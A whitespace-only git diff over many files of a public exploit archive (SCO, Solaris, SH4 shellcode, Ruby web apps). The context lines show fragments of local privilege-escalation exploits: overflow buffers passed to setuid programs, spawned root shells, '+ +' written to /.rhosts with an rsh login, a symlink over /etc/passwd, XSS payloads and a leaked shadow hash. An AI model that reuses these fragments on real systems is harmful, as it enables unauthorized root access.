\ No newline at end of file diff --git a/platforms/qnx/local/32156.txt b/platforms/qnx/local/32156.txt index 4f9e1f622..1fac577a5 100755 --- a/platforms/qnx/local/32156.txt +++ b/platforms/qnx/local/32156.txt @@ -23,4 +23,4 @@ uid=100(user) gid=100 $ ls -la /etc/shadow -rw------- 1 root root 69 Oct 10 16:55 /etc/shadow $ pppoectl -f /etc/shadow lo0 -pppoectl: bad parameter: "root:QSkSGrRQOSLoO:1380296317:0:0" +pppoectl: bad parameter: "root:QSkSGrRQOSLoO:1380296317:0:0" \ No newline at end of file diff --git a/platforms/ruby/webapps/39730.txt b/platforms/ruby/webapps/39730.txt index f2a914acf..b114ff8b3 100755 --- a/platforms/ruby/webapps/39730.txt +++ b/platforms/ruby/webapps/39730.txt @@ -101,4 +101,4 @@ https://github.com/nationbuilder/nationbuilder-rb <input type="submit" value="Submit request" /> </form> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/ruby/webapps/39997.txt b/platforms/ruby/webapps/39997.txt index 24f0f1fb2..2fd00162a 100755 --- a/platforms/ruby/webapps/39997.txt +++ b/platforms/ruby/webapps/39997.txt @@ -33,5 +33,4 @@ Name: <script>alert('XSS 1')</script> Email Address: <script>alert('XSS2')</script>@gmail.com Username: <script>alert('XSS3')</script> -This will not only reflect back to you, as the designer, but also the back to the admin when he/she goes onto the http://127.0.0.1/admin/users/ and is presented with our users malicious 'NAME' parameter. - +This will not only reflect back to you, as the designer, but also the back to the admin when he/she goes onto the http://127.0.0.1/admin/users/ and is presented with our users malicious 'NAME' parameter. \ No newline at end of file diff --git a/platforms/ruby/webapps/40236.txt b/platforms/ruby/webapps/40236.txt index aa31ac9e2..536e19015 100755 --- a/platforms/ruby/webapps/40236.txt +++ b/platforms/ruby/webapps/40236.txt @@ -32,4 +32,4 @@ Where 'root' - desired user. 'authenticity_token' - token obtained on the previo 3. Solution: Use officialy provided solutions: -https://about.gitlab.com/2016/05/02/cve-2016-4340-patches/ +https://about.gitlab.com/2016/05/02/cve-2016-4340-patches/ \ No newline at end of file diff --git a/platforms/sco/local/1402.c b/platforms/sco/local/1402.c index e966b2fab..c77d1dc25 100755 --- a/platforms/sco/local/1402.c +++ b/platforms/sco/local/1402.c @@ -56,4 +56,4 @@ int main(int argc,char* argv[]) exit(0); } -// milw0rm.com [2006-01-03] +// milw0rm.com [2006-01-03] \ No newline at end of file diff --git a/platforms/sco/local/1534.c b/platforms/sco/local/1534.c index d1e44efc5..58bf13919 100755 --- a/platforms/sco/local/1534.c +++ b/platforms/sco/local/1534.c @@ -85,4 +85,4 @@ int main(int argc,char* argv[]) return 0; } -// milw0rm.com [2006-02-26] +// milw0rm.com [2006-02-26] \ No newline at end of file diff --git a/platforms/sco/local/19543.c b/platforms/sco/local/19543.c index f443e9e7d..a9ad8221e 100755 --- a/platforms/sco/local/19543.c +++ b/platforms/sco/local/19543.c @@ -76,6 +76,4 @@ execl("/opt/K/SCO/Unix/5.0.5Eb/.softmgmt/var/usr/bin/cancel", "cancel", buf, NULL); exit(0); -} - - +} \ No newline at end of file diff --git a/platforms/sco/local/19641.c b/platforms/sco/local/19641.c index 0aec46e1c..99717187b 100755 --- a/platforms/sco/local/19641.c +++ b/platforms/sco/local/19641.c @@ -109,4 +109,4 @@ int main (int argc, char *argv[]) { printf("exec failed!\n"); return 0; -} +} \ No newline at end of file diff --git a/platforms/sco/local/19642.c b/platforms/sco/local/19642.c index 7fc447b31..a537535a1 100755 --- a/platforms/sco/local/19642.c +++ b/platforms/sco/local/19642.c @@ -46,4 +46,4 @@ int main (int argc, char *argv[]) printf("exec failed!\n"); return 0; -} +} \ No newline at end of file diff --git a/platforms/sco/local/19643.c b/platforms/sco/local/19643.c index 9d14d6c57..9b2c6c26a 100755 --- a/platforms/sco/local/19643.c +++ b/platforms/sco/local/19643.c @@ -44,4 +44,4 @@ int main (int argc, char *argv[]) printf("exec failed!\n"); return 0; -} +} \ No newline at end of file diff --git a/platforms/sco/local/19654.pl b/platforms/sco/local/19654.pl index 7a4c75315..e6d81b9ce 100755 --- a/platforms/sco/local/19654.pl +++ b/platforms/sco/local/19654.pl @@ -148,4 +148,4 @@ v bash-2.02$ = ---- /patience --- +--- /patience --- \ No newline at end of file diff --git a/platforms/sco/local/19656.c b/platforms/sco/local/19656.c index 42dc1ec9d..3474a4e63 100755 --- a/platforms/sco/local/19656.c +++ b/platforms/sco/local/19656.c @@ -108,4 +108,4 @@ int main(int argc, char *argv[]) { = -} +} \ No newline at end of file diff --git a/platforms/sco/local/19659.sh b/platforms/sco/local/19659.sh index 63fd6e93c..f3948fec1 100755 --- a/platforms/sco/local/19659.sh +++ b/platforms/sco/local/19659.sh @@ -13,6 +13,4 @@ This attack will most likely result in a denial of service attack, however if th #### pid=`expr $$ + 4`; ln -s /path/to/sys/group/writable/file core.$pid -/usr/sbin/arp `perl -e "print 'A' x 10000"` - - +/usr/sbin/arp `perl -e "print 'A' x 10000"` \ No newline at end of file diff --git a/platforms/sco/local/19661.c b/platforms/sco/local/19661.c index 3c8a056d5..526bbc8dc 100755 --- a/platforms/sco/local/19661.c +++ b/platforms/sco/local/19661.c @@ -90,4 +90,4 @@ buf[buflen - 1] = ':'; printf(buf); exit(0); -} +} \ No newline at end of file diff --git a/platforms/sco/local/19674.c b/platforms/sco/local/19674.c index 1dae24a33..8a8a26f1d 100755 --- a/platforms/sco/local/19674.c +++ b/platforms/sco/local/19674.c @@ -110,4 +110,4 @@ buf[buflen - 1] = 0; system("/bin/sh"); exit(0); -} +} \ No newline at end of file diff --git a/platforms/sco/local/19752.txt b/platforms/sco/local/19752.txt index 311ef992a..afc90e4d8 100755 --- a/platforms/sco/local/19752.txt +++ b/platforms/sco/local/19752.txt @@ -4,5 +4,4 @@ A symlink following vulnerability exists in the ARCserve agent, as shipped with echo "+ +" > /usr/CYEagent/agent.cfg rm /tmp/asagent.tmp -ln -sf /.rhosts /tmp/asagent.tmp - +ln -sf /.rhosts /tmp/asagent.tmp \ No newline at end of file diff --git a/platforms/sco/local/20230.c b/platforms/sco/local/20230.c index df7004eff..482708c4d 100755 --- a/platforms/sco/local/20230.c +++ b/platforms/sco/local/20230.c @@ -267,4 +267,4 @@ char *p; env[1] = 0; execve(arg[0], arg, env); -} +} \ No newline at end of file diff --git a/platforms/sco/local/21489.txt b/platforms/sco/local/21489.txt index 19331e525..57aff8a6c 100755 --- a/platforms/sco/local/21489.txt +++ b/platforms/sco/local/21489.txt @@ -4,6 +4,4 @@ A vulnerability has been reported in the scoadmin utility that may allow a local ln -s /etc/passwd /tmp/tclerror.1195.log -If the process ID of the SCOadmin process is 1195, /etc/passwd will be overwritten. - - +If the process ID of the SCOadmin process is 1195, /etc/passwd will be overwritten. \ No newline at end of file diff --git a/platforms/sco/local/23141.sh b/platforms/sco/local/23141.sh index 2dded6e6c..52bbf9a9f 100755 --- a/platforms/sco/local/23141.sh +++ b/platforms/sco/local/23141.sh @@ -22,4 +22,4 @@ chmod 755 hostname /usr/internet/admin/mana/mana > /dev/null -/tmp/sh +/tmp/sh \ No newline at end of file diff --git a/platforms/sco/local/23143.sh b/platforms/sco/local/23143.sh index 6f12789ef..8e149e4e4 100755 --- a/platforms/sco/local/23143.sh +++ b/platforms/sco/local/23143.sh @@ -24,4 +24,4 @@ chmod 755 hostname /usr/internet/admin/mana/mana > /dev/null -/tmp/sh +/tmp/sh \ No newline at end of file diff --git a/platforms/sco/local/2332.c b/platforms/sco/local/2332.c index 5e666116c..a9cc2b322 100755 --- a/platforms/sco/local/2332.c +++ b/platforms/sco/local/2332.c @@ -83,4 +83,4 @@ int main(int argc,char **argv){ exit(EXIT_FAILURE); } -// milw0rm.com [2006-09-08] +// milw0rm.com [2006-09-08] \ No newline at end of file diff --git a/platforms/sco/local/24293.c b/platforms/sco/local/24293.c index bacd142f0..9aba2d51a 100755 --- a/platforms/sco/local/24293.c +++ b/platforms/sco/local/24293.c @@ -47,6 +47,4 @@ main(int argc,char **argv) { *p=0; execl("/usr/mmdf/bin/deliver","deliver",buffer,0); -} - - +} \ No newline at end of file diff --git a/platforms/sco/local/261.c b/platforms/sco/local/261.c index 0398ace10..ecdc16d32 100755 --- a/platforms/sco/local/261.c +++ b/platforms/sco/local/261.c @@ -59,4 +59,4 @@ int main (int argc, char *argv[]) { } -// milw0rm.com [2001-01-26] +// milw0rm.com [2001-01-26] \ No newline at end of file diff --git a/platforms/sco/local/5355.sh b/platforms/sco/local/5355.sh index 008d1bcbc..e473cf3ec 100755 --- a/platforms/sco/local/5355.sh +++ b/platforms/sco/local/5355.sh @@ -20,4 +20,4 @@ else su root -c "$0 `id -un`; /bin/sh -i" fi -# milw0rm.com [2008-04-04] +# milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/sco/local/5356.c b/platforms/sco/local/5356.c index f251e604c..681f35a68 100755 --- a/platforms/sco/local/5356.c +++ b/platforms/sco/local/5356.c @@ -81,4 +81,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2008-04-04] +// milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/sco/local/5357.c b/platforms/sco/local/5357.c index 22571982b..49d20a465 100755 --- a/platforms/sco/local/5357.c +++ b/platforms/sco/local/5357.c @@ -86,4 +86,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2008-04-04] +// milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/sco/local/602.c b/platforms/sco/local/602.c index 7a5986376..d57502f90 100755 --- a/platforms/sco/local/602.c +++ b/platforms/sco/local/602.c @@ -43,4 +43,4 @@ main(int argc,char **argv) { -// milw0rm.com [2004-10-26] +// milw0rm.com [2004-10-26] \ No newline at end of file diff --git a/platforms/sco/remote/19680.c b/platforms/sco/remote/19680.c index bfbc2b79b..7a077e3a2 100755 --- a/platforms/sco/remote/19680.c +++ b/platforms/sco/remote/19680.c @@ -194,5 +194,4 @@ fprintf(stderr, "using addr 0x%x with offset %d \n", addr, offset); fprintf(stderr, "mime-encode the stdoutput!\n"); printf(buf); -} - +} \ No newline at end of file diff --git a/platforms/sco/remote/20620.c b/platforms/sco/remote/20620.c index 3166268ac..086a8c538 100755 --- a/platforms/sco/remote/20620.c +++ b/platforms/sco/remote/20620.c @@ -305,5 +305,4 @@ else cat $msg|/etc/ttcp -u -t -l762 -p$portnumber $hostname } fi -rm $msg - +rm $msg \ No newline at end of file diff --git a/platforms/sh4/shellcode/17432.c b/platforms/sh4/shellcode/17432.c index 971f79454..a29c167d3 100755 --- a/platforms/sh4/shellcode/17432.c +++ b/platforms/sh4/shellcode/17432.c @@ -43,4 +43,4 @@ int main(void) { fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); -} +} \ No newline at end of file diff --git a/platforms/sh4/shellcode/17439.c b/platforms/sh4/shellcode/17439.c index 9520fcc25..9dc64ca2d 100755 --- a/platforms/sh4/shellcode/17439.c +++ b/platforms/sh4/shellcode/17439.c @@ -105,5 +105,4 @@ int main(void) fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); return 0; -} - +} \ No newline at end of file diff --git a/platforms/sh4/shellcode/18154.c b/platforms/sh4/shellcode/18154.c index 43b16c01c..6b7f3be05 100755 --- a/platforms/sh4/shellcode/18154.c +++ b/platforms/sh4/shellcode/18154.c @@ -34,4 +34,4 @@ void main(void) { fprintf(stdout, "Length: %d\n", strlen(SC)); (*(void(*)()) SC)(); -} +} \ No newline at end of file diff --git a/platforms/solaris/dos/11351.c b/platforms/solaris/dos/11351.c index a5894c8ce..eaa8cbc06 100755 --- a/platforms/solaris/dos/11351.c +++ b/platforms/solaris/dos/11351.c @@ -76,4 +76,4 @@ main() return ret; } -/* EOF */ +/* EOF */ \ No newline at end of file diff --git a/platforms/solaris/dos/19635.c b/platforms/solaris/dos/19635.c index 9dfd2b43e..ae3fc93fa 100755 --- a/platforms/solaris/dos/19635.c +++ b/platforms/solaris/dos/19635.c @@ -282,5 +282,4 @@ void make_file(char *fname, char *buf, int type) { } xdr_destroy(&xdrm); close(fd); -} - +} \ No newline at end of file diff --git a/platforms/solaris/dos/235.pl b/platforms/solaris/dos/235.pl index 67f862a14..68c6222d0 100755 --- a/platforms/solaris/dos/235.pl +++ b/platforms/solaris/dos/235.pl @@ -30,4 +30,4 @@ while(1) { } -# milw0rm.com [2000-12-20] +# milw0rm.com [2000-12-20] \ No newline at end of file diff --git a/platforms/solaris/dos/240.sh b/platforms/solaris/dos/240.sh index 747577c33..b287352d2 100755 --- a/platforms/solaris/dos/240.sh +++ b/platforms/solaris/dos/240.sh @@ -17,4 +17,4 @@ chmod 0 /var/mail/$x.lock done -# milw0rm.com [2001-01-03] +# milw0rm.com [2001-01-03] \ No newline at end of file diff --git a/platforms/solaris/dos/29540.c b/platforms/solaris/dos/29540.c index 6b203df0b..1246dde03 100755 --- a/platforms/solaris/dos/29540.c +++ b/platforms/solaris/dos/29540.c @@ -85,5 +85,4 @@ int main(int argc, char *argv[]) } return(0); -} - +} \ No newline at end of file diff --git a/platforms/solaris/dos/34028.txt b/platforms/solaris/dos/34028.txt index 4788e9ccb..0ef0897fe 100755 --- a/platforms/solaris/dos/34028.txt +++ b/platforms/solaris/dos/34028.txt @@ -163,4 +163,4 @@ ftp://192.168.11.143/////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// -//////////////////////////////////////site chmod 777 . +//////////////////////////////////////site chmod 777 . \ No newline at end of file diff --git a/platforms/solaris/dos/4881.c b/platforms/solaris/dos/4881.c index 5ef13a775..656b87883 100755 --- a/platforms/solaris/dos/4881.c +++ b/platforms/solaris/dos/4881.c @@ -79,4 +79,4 @@ int main(int argc, char *argv[]) return(0); } -// milw0rm.com [2008-01-10] +// milw0rm.com [2008-01-10] \ No newline at end of file diff --git a/platforms/solaris/dos/5258.c b/platforms/solaris/dos/5258.c index b5119380e..bda26fe8e 100755 --- a/platforms/solaris/dos/5258.c +++ b/platforms/solaris/dos/5258.c @@ -72,4 +72,4 @@ main(int argc,char **argv){ } } -// milw0rm.com [2008-03-14] +// milw0rm.com [2008-03-14] \ No newline at end of file diff --git a/platforms/solaris/dos/6775.c b/platforms/solaris/dos/6775.c index f1acddda1..ea8e1e0f0 100755 --- a/platforms/solaris/dos/6775.c +++ b/platforms/solaris/dos/6775.c @@ -88,4 +88,4 @@ if ((c1 = clnt_create(server,100000, 4, "tcp")) == NULL){ exit(0); } -// milw0rm.com [2008-10-17] +// milw0rm.com [2008-10-17] \ No newline at end of file diff --git a/platforms/solaris/dos/7865.c b/platforms/solaris/dos/7865.c index aaa204089..a26e47205 100755 --- a/platforms/solaris/dos/7865.c +++ b/platforms/solaris/dos/7865.c @@ -101,4 +101,4 @@ Kernel Crash Dump May Look Like The Following Snippet [ID 172908 kern.notice] Copyright 1983-2008 Sun Microsystems, Inc. All rights reserved. */ -// milw0rm.com [2009-01-26] +// milw0rm.com [2009-01-26] \ No newline at end of file diff --git a/platforms/solaris/dos/8597.c b/platforms/solaris/dos/8597.c index 5a051ca5d..bef307d1d 100755 --- a/platforms/solaris/dos/8597.c +++ b/platforms/solaris/dos/8597.c @@ -100,4 +100,4 @@ main (int argc, char **argv) return (EXIT_SUCCESS); } -// milw0rm.com [2009-05-04] +// milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/platforms/solaris/dos/8598.c b/platforms/solaris/dos/8598.c index 7f93d233e..7954b1914 100755 --- a/platforms/solaris/dos/8598.c +++ b/platforms/solaris/dos/8598.c @@ -81,4 +81,4 @@ main (int argc, char **argv) return (EXIT_SUCCESS); } -// milw0rm.com [2009-05-04] +// milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/platforms/solaris/dos/9823.c b/platforms/solaris/dos/9823.c index 46dce13a5..7c133aa26 100755 --- a/platforms/solaris/dos/9823.c +++ b/platforms/solaris/dos/9823.c @@ -173,4 +173,4 @@ if(clnt_stat != RPC_SUCCESS) clnt_perror(cli, "rpc"); auth_destroy(cli->cl_auth); clnt_destroy(cli); -} +} \ No newline at end of file diff --git a/platforms/solaris/local/1073.c b/platforms/solaris/local/1073.c index f04633e2d..4e99ab75b 100755 --- a/platforms/solaris/local/1073.c +++ b/platforms/solaris/local/1073.c @@ -30,4 +30,4 @@ atari:venglin:~> su uid=0(root) gid=10(staff) */ -// milw0rm.com [2005-06-28] +// milw0rm.com [2005-06-28] \ No newline at end of file diff --git a/platforms/solaris/local/1074.c b/platforms/solaris/local/1074.c index ddba0778d..6ca956ed0 100755 --- a/platforms/solaris/local/1074.c +++ b/platforms/solaris/local/1074.c @@ -27,4 +27,4 @@ $ ping uid=0(root) gid=100(student) */ -// milw0rm.com [2005-06-28] +// milw0rm.com [2005-06-28] \ No newline at end of file diff --git a/platforms/solaris/local/1092.c b/platforms/solaris/local/1092.c index dd5c3340f..138ffff26 100755 --- a/platforms/solaris/local/1092.c +++ b/platforms/solaris/local/1092.c @@ -279,4 +279,4 @@ main(int argc, char **argv) return(0); } -// milw0rm.com [2005-07-06] +// milw0rm.com [2005-07-06] \ No newline at end of file diff --git a/platforms/solaris/local/114.c b/platforms/solaris/local/114.c index 60cf75236..0cd994a0c 100755 --- a/platforms/solaris/local/114.c +++ b/platforms/solaris/local/114.c @@ -460,4 +460,4 @@ unsigned long get_strcpy_addr() } -// milw0rm.com [2003-10-27] +// milw0rm.com [2003-10-27] \ No newline at end of file diff --git a/platforms/solaris/local/1182.c b/platforms/solaris/local/1182.c index b6af87546..131cfb25b 100755 --- a/platforms/solaris/local/1182.c +++ b/platforms/solaris/local/1182.c @@ -298,4 +298,4 @@ void set_val(char *buf, int pos, int val) buf[pos + 3] = (val & 0x000000ff); } -// milw0rm.com [2004-12-24] +// milw0rm.com [2004-12-24] \ No newline at end of file diff --git a/platforms/solaris/local/1248.pl b/platforms/solaris/local/1248.pl index 0659a5ac0..8180a4a68 100755 --- a/platforms/solaris/local/1248.pl +++ b/platforms/solaris/local/1248.pl @@ -64,4 +64,4 @@ system("/usr/dt/bin/$dtsuid"); # EOF -# milw0rm.com [2005-10-12] +# milw0rm.com [2005-10-12] \ No newline at end of file diff --git a/platforms/solaris/local/1360.c b/platforms/solaris/local/1360.c index 48d8d530f..55144edf3 100755 --- a/platforms/solaris/local/1360.c +++ b/platforms/solaris/local/1360.c @@ -150,4 +150,4 @@ return(EXIT_SUCCESS); } -// milw0rm.com [2005-12-07] +// milw0rm.com [2005-12-07] \ No newline at end of file diff --git a/platforms/solaris/local/15245.txt b/platforms/solaris/local/15245.txt index 178381b45..d3d826474 100755 --- a/platforms/solaris/local/15245.txt +++ b/platforms/solaris/local/15245.txt @@ -81,5 +81,4 @@ int main(int argc,char *argv[]){ } -// This was disclosed and patched in October 2010, CVE-2010-3503 - +// This was disclosed and patched in October 2010, CVE-2010-3503 \ No newline at end of file diff --git a/platforms/solaris/local/15962.c b/platforms/solaris/local/15962.c index 22319504f..5ea2c356f 100755 --- a/platforms/solaris/local/15962.c +++ b/platforms/solaris/local/15962.c @@ -200,4 +200,4 @@ int main(int argc, char **argv) { system("/bin/sh"); return 0; -} +} \ No newline at end of file diff --git a/platforms/solaris/local/19128.c b/platforms/solaris/local/19128.c index 84ceeb799..9668e1f50 100755 --- a/platforms/solaris/local/19128.c +++ b/platforms/solaris/local/19128.c @@ -74,4 +74,4 @@ x[OFFSET3+ADJUST+i]=exploit_code[i]; x[10000]=0; execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert", "-d",x,"test",(char *) 0); -} +} \ No newline at end of file diff --git a/platforms/solaris/local/19158.c b/platforms/solaris/local/19158.c index 4c8bfaaca..b189cb600 100755 --- a/platforms/solaris/local/19158.c +++ b/platforms/solaris/local/19158.c @@ -62,4 +62,4 @@ void main(int argc, char *argv[]) targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/bin/passwd", "passwd", buf,(char *) 0); perror("execl failed"); -} +} \ No newline at end of file diff --git a/platforms/solaris/local/19159.c b/platforms/solaris/local/19159.c index 57362e8ed..4f1cdf180 100755 --- a/platforms/solaris/local/19159.c +++ b/platforms/solaris/local/19159.c @@ -60,4 +60,4 @@ targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/usr/sbin/ffbconfig", "ffbconfig", "-dev", buf,(char *) 0); perror("execl failed"); -} +} \ No newline at end of file diff --git a/platforms/solaris/local/19160.c b/platforms/solaris/local/19160.c index 8f7551abe..ae0162eaa 100755 --- a/platforms/solaris/local/19160.c +++ b/platforms/solaris/local/19160.c @@ -489,5 +489,4 @@ elferr() fprintf(stderr, "%s: %s\n", prog, elf_errmsg(elf_errno())); exit(1); -} - +} \ No newline at end of file diff --git a/platforms/solaris/local/19199.c b/platforms/solaris/local/19199.c index 347d95903..9f10e0835 100755 --- a/platforms/solaris/local/19199.c +++ b/platforms/solaris/local/19199.c @@ -91,5 +91,4 @@ clnt_perror(cl, "mount call"); else printf("mntres = %d.\n", result.status); clnt_destroy(cl); -} - +} \ No newline at end of file diff --git a/platforms/solaris/local/19205.c b/platforms/solaris/local/19205.c index 57d18a8a8..3abdba1b6 100755 --- a/platforms/solaris/local/19205.c +++ b/platforms/solaris/local/19205.c @@ -59,5 +59,4 @@ main() x[BUFSIZE]=0; execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0); -} - +} \ No newline at end of file diff --git a/platforms/solaris/local/19206.c b/platforms/solaris/local/19206.c index 2d18900da..339ae8798 100755 --- a/platforms/solaris/local/19206.c +++ b/platforms/solaris/local/19206.c @@ -58,5 +58,4 @@ main(int argc, char **argv) x[5000]='='; x[18000]=0; execl("/usr/bin/lpset","lpset","-n","xfn","-a",x,"lpcol1",(char *) 0); -} - +} \ No newline at end of file diff --git a/platforms/solaris/local/19235.txt b/platforms/solaris/local/19235.txt index 16adc0e37..3dc26ae3c 100755 --- a/platforms/solaris/local/19235.txt +++ b/platforms/solaris/local/19235.txt @@ -21,5 +21,4 @@ You could then create the link (to .rhosts in the example) using the <gibberish % rsh -l bin localhost /bin/csh -i Warning: no access to tty; thus no job control in this shell... % id -uid=2(bin) gid=2(bin) - +uid=2(bin) gid=2(bin) \ No newline at end of file diff --git a/platforms/solaris/local/19341.c b/platforms/solaris/local/19341.c index 13e3d0f94..6e755919e 100755 --- a/platforms/solaris/local/19341.c +++ b/platforms/solaris/local/19341.c @@ -102,6 +102,4 @@ main (int argc, char *argv[]) printf("exec failed!\n"); return; -} - - +} \ No newline at end of file diff --git a/platforms/solaris/local/19342.c b/platforms/solaris/local/19342.c index 32c273bdc..32e627759 100755 --- a/platforms/solaris/local/19342.c +++ b/platforms/solaris/local/19342.c @@ -116,4 +116,4 @@ main() putenv(buf); execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0); -} +} \ No newline at end of file diff --git a/platforms/solaris/local/19509.sh b/platforms/solaris/local/19509.sh index 8ab022b12..b22040d67 100755 --- a/platforms/solaris/local/19509.sh +++ b/platforms/solaris/local/19509.sh @@ -16,6 +16,4 @@ ln -s /.rhosts /var/tmp/ps.profile export LD_PROFILE=/usr/bin/ps /usr/bin/ps echo + + > /.rhosts -rsh -l root localhost csh -i - - +rsh -l root localhost csh -i \ No newline at end of file diff --git a/platforms/solaris/local/19529.c b/platforms/solaris/local/19529.c index b19764c10..9b2c288c0 100755 --- a/platforms/solaris/local/19529.c +++ b/platforms/solaris/local/19529.c @@ -115,5 +115,4 @@ main (int argc, char *argv[]) for (i = 0; i < strlen(buf); i++) putchar(buf[i]); return; -} - +} \ No newline at end of file diff --git a/platforms/solaris/local/19533.c b/platforms/solaris/local/19533.c index ef7bae735..cdbe8c58a 100755 --- a/platforms/solaris/local/19533.c +++ b/platforms/solaris/local/19533.c @@ -53,6 +53,4 @@ main(int argc, char **argv) { buf[i+7]=(esp >> 24) & 0xFF; printf("Offset: 0x%x\n\n",esp); execl("/usr/lib/fs/ufs/ufsdump","ufsdump","1",buf,NULL); -} - - +} \ No newline at end of file diff --git a/platforms/solaris/local/19534.c b/platforms/solaris/local/19534.c index 130408427..0ed540b10 100755 --- a/platforms/solaris/local/19534.c +++ b/platforms/solaris/local/19534.c @@ -106,4 +106,4 @@ main (int argc, char *argv[]) printf("exec failed!\n"); return; -} +} \ No newline at end of file diff --git a/platforms/solaris/local/19648.c b/platforms/solaris/local/19648.c index aef6a8fd6..568f4f616 100755 --- a/platforms/solaris/local/19648.c +++ b/platforms/solaris/local/19648.c @@ -174,13 +174,4 @@ main() strncpy(buf+EXPADR,exploit_code,strlen(exploit_code)); buf[MAXBUF-1]=0; execl("/usr/dt/bin/dtmailpr","dtmailpr","-f",buf,0); -} - - - - - - - - - +} \ No newline at end of file diff --git a/platforms/solaris/local/197.c b/platforms/solaris/local/197.c index 1372f2ff8..8fc2d86d1 100755 --- a/platforms/solaris/local/197.c +++ b/platforms/solaris/local/197.c @@ -300,4 +300,4 @@ main(int argc, char **argv) } -// milw0rm.com [2000-11-20] +// milw0rm.com [2000-11-20] \ No newline at end of file diff --git a/platforms/solaris/local/19872.c b/platforms/solaris/local/19872.c index 2f8988612..b0ea465e8 100755 --- a/platforms/solaris/local/19872.c +++ b/platforms/solaris/local/19872.c @@ -1,4 +1,3 @@ - source: http://www.securityfocus.com/bid/1138/info A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root. diff --git a/platforms/solaris/local/20014.c b/platforms/solaris/local/20014.c index 7d8ceadac..fe21b7808 100755 --- a/platforms/solaris/local/20014.c +++ b/platforms/solaris/local/20014.c @@ -247,5 +247,4 @@ main() fprintf(fp,buf);fflush(fp); return EXIT_SUCCESS; } -} - +} \ No newline at end of file diff --git a/platforms/solaris/local/20147.sh b/platforms/solaris/local/20147.sh index da772f1fc..70e4bd2f5 100755 --- a/platforms/solaris/local/20147.sh +++ b/platforms/solaris/local/20147.sh @@ -38,5 +38,4 @@ Certain versions of the software shipped to configure the Raptor GFX cards are v /usr/sbin/pgxconfig -i rm -f chown - ./foobar - + ./foobar \ No newline at end of file diff --git a/platforms/solaris/local/20188.c b/platforms/solaris/local/20188.c index 3858c4088..a2bb97451 100755 --- a/platforms/solaris/local/20188.c +++ b/platforms/solaris/local/20188.c @@ -156,4 +156,4 @@ main( int argc, char **argv ) system("cp messages.mo SUNW_OST_OSLIB"); execle(VULPROG,VULPROG,"-x",retlocbuf + align1, NULL, env); -} /* end of main */ +} /* end of main */ \ No newline at end of file diff --git a/platforms/solaris/local/20514.pl b/platforms/solaris/local/20514.pl index 5b883af1a..7dbee4ff8 100755 --- a/platforms/solaris/local/20514.pl +++ b/platforms/solaris/local/20514.pl @@ -38,4 +38,4 @@ $clobber\n" if ($NOISY); } } -} +} \ No newline at end of file diff --git a/platforms/solaris/local/20520.pl b/platforms/solaris/local/20520.pl index b9cb73993..c44ab82e2 100755 --- a/platforms/solaris/local/20520.pl +++ b/platforms/solaris/local/20520.pl @@ -55,5 +55,4 @@ while(<list>) { exit(1); } } -} - +} \ No newline at end of file diff --git a/platforms/solaris/local/20521.pl b/platforms/solaris/local/20521.pl index ad67a2afa..2ab2c1195 100755 --- a/platforms/solaris/local/20521.pl +++ b/platforms/solaris/local/20521.pl @@ -31,6 +31,4 @@ if (/catman/) { } } -} - - +} \ No newline at end of file diff --git a/platforms/solaris/local/20603.c b/platforms/solaris/local/20603.c index 5cdaae80e..443069b25 100755 --- a/platforms/solaris/local/20603.c +++ b/platforms/solaris/local/20603.c @@ -94,5 +94,4 @@ main() buf[BUF_SIZE-1]=0; execl("/usr/dt/bin/dtaction",buf,NULL); -} - +} \ No newline at end of file diff --git a/platforms/solaris/local/2067.c b/platforms/solaris/local/2067.c index 5ec2bd5b4..900e2ba59 100755 --- a/platforms/solaris/local/2067.c +++ b/platforms/solaris/local/2067.c @@ -44,4 +44,4 @@ int main(int argc,char* argv[]){ exit(0); } -// milw0rm.com [2006-07-24] +// milw0rm.com [2006-07-24] \ No newline at end of file diff --git a/platforms/solaris/local/20684.c b/platforms/solaris/local/20684.c index 1e61577a8..f6adf7eb1 100755 --- a/platforms/solaris/local/20684.c +++ b/platforms/solaris/local/20684.c @@ -51,5 +51,4 @@ char shell[]= system("/usr/bin/tip 5"); unlink("/tmp/xx"); -} - +} \ No newline at end of file diff --git a/platforms/solaris/local/20715.txt b/platforms/solaris/local/20715.txt index 6ad3d19f4..03e428d7a 100755 --- a/platforms/solaris/local/20715.txt +++ b/platforms/solaris/local/20715.txt @@ -17,5 +17,4 @@ In Selection part, input the file path you want to create ex: /.rhosts Following file is created in a second. --rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost - +-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost \ No newline at end of file diff --git a/platforms/solaris/local/20740.c b/platforms/solaris/local/20740.c index 5ba0d41b5..3d7f24640 100755 --- a/platforms/solaris/local/20740.c +++ b/platforms/solaris/local/20740.c @@ -52,4 +52,4 @@ int main (int argc, char *argv[]) execl("/usr/openwin/bin/kcms_configure", "eEye", "-o","-S","X",buf,NULL); return; -} +} \ No newline at end of file diff --git a/platforms/solaris/local/20741.c b/platforms/solaris/local/20741.c index 8a1c09cbf..c1bd160ea 100755 --- a/platforms/solaris/local/20741.c +++ b/platforms/solaris/local/20741.c @@ -233,4 +233,4 @@ i+=4) memcpy( &buf[i], &pa, 4); memcpy(&buf[1081], addr,offset,pa,strlen(buf)); execl("/usr/X/bin/kcms_configure", "pine","-o","-S","blah",buf,NULL); puts("exec failed"); return 0; } // ... END ... -#endif +#endif \ No newline at end of file diff --git 